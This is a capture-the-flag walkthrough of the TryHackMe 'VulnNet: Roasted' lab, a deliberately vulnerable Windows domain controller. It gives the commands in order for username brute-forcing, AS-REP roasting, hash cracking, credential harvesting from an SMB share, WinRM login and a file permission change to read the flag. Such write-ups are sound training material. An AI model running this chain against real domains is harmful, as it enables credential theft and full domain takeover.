TryHackMe - VulnNet Roasted - Walkthrough

Introduction

Today we're going to be doing a walkthrough for the VulnNet: Roasted room hosted at https://tryhackme.com/room/vulnnetroasted . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows client as the the victim machine. After we're given the IP address of the server, we assign the IP address to the alias vulnnet-roasted.thm.

The first thing we'll do is fire off an Nmap scan.

nmap -Pn -p-10000 -T4 vulnnet-roasted.thm

nmap -Pn -T4 -sV -sC -p53,88,135,139,389,445,464,593,636,3268,3269,9389 vulnnet-roasted.thm

This server appears to be domain joined, and being the only (we assume) domain joined server on the network, we can assume that it is also the Domain Controller. Let's test whether or not we can brute-force the usernames from the server using Crackmapexec:

crackmapexec smb vulnnet-roasted.thm -u guest -p ‘’ --rid-brute

Because the guest account was not disabled on the server, we were able to enumerate a number of usernames. We save these names to a file and attempt asrep-roasting using the Impacket GetNPUsers.py script:

python3 /opt/impacket/examples/GetNPUsers.py VULNNET-RST/ -dc-ip vulnnet-roasted.thm -no-pass -usersfile /home/kali/walks/thm/vulnNet-roasted/user.txt -request -format john -outputfile asrep.hash -debug | tee getnpusers.log

Now to check whether we received any asrep hashes.

cat asrep.hash

It looks like we got the t-skid user's hash. Let's crack it with John:

john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hash

John cracked the hash. Let's check if these credentials are valid by accessing the SMB shares with the account:

smbclient -L //vulnet-roasted.thm/ -U 't-skid'
input password from cracked hash

There are a few different shares available, but the one we want is the NETLOGON share:

smbclient //vulnnet-roasted.thm/NETLOGON/ -U 't-skid'
same password as before

We'll just download this interesting-looking file:

get ResetPassword.vbs

When we read the file, we find some credentials:

cat ResetPassword.vbs

We'll check the validity of these credentials using Crackmapexec:

crackmapexec smb vulnnet-roasted.thm -u 'a-whitehat' -p 'capturedPassword'

The Crackmapexec ouput indicates that not only are these credentials valid, but it seems that the a-whitehat user is an Administrator on the system. Let's try logging in with Evil-WinRM:

evil-winrm -i vulnnet-roasted.thm -u 'a-whitehat' -p 'capturedPassword'

Capturing the User Flag

The user flag on this system is located in the enterprise-core-vn user's desktop directory:

type c:\users\enterprise-core-vn\desktop\user.txt

Privilege Escalation

Crackmapexec reported that the a-whitehat user was an admin on the system, and we can see the system.txt flag file in the Administrator's Desktop directory, but we are unable to read it. Time to check out our user account's details:

net users a-whitehat

Capturing the System Flag

As a member of the Domain Admins group, our user account can change file permissions for any file on the system, so we'll do just that to read the system.txt flag.

cacls c:\users\administrator\desktop\system.txt /e /p Everyone:f
type c:\users\administrator\desktop\system.txt

Summary

The server, which also acts as a Windows Active Directory Domain Controller, had its guest user account enabled, which led to username bruteforcing via SMB. Once a list of usernames was assembled, we found that one of the user accounts was vulnerable to asrep-roasting, and so we could use that account to access an SMB share which contained a file with credentials in it. With these new credentials, we were able to login to the server through the WinRM service. Once there, we found that the user account we captured was a Domain Admins group member, so we used their privileges to capture our objective flag files.

Finish